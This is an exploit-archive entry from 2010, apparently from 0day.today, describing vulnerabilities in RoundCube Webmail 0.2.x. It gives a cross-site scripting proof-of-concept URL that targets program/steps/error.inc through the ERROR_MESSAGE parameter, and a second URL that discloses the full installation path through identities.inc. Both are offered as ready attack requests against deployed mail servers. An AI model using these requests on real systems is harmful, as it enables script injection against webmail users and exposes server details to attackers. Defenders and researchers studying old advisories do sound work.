RoundCube Webmail Multiple Vulerabilities

2010-01-06T00:00:00
ID 1337DAY-ID-10617
Type zdt
Reporter j4ck
Modified 2010-01-06T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =========================================
RoundCube Webmail Multiple Vulerabilities
=========================================

# Exploit Title: RoundCube Webmail XSS Voulerability
# Date: 6.01.2010
# Author: j4ck & Globus from elitehackers.pl
# Software Link: Software link : http://roundcube.net/download
# Version: 0.2.X , | possible voulerability in higher versions.
# Tested on: *
# Code :
 
XSS:
 
http://[somesite.com]/[roundcube_path]/program/steps/error.inc?ERROR_CODE=601&ERROR_MESSAGE=123
 
We can get FPD or roundcube installation path via:
 
http://www.[somesite.com]/webmail/program/steps/settings/identities.inc



#  0day.today [2017-12-31]  #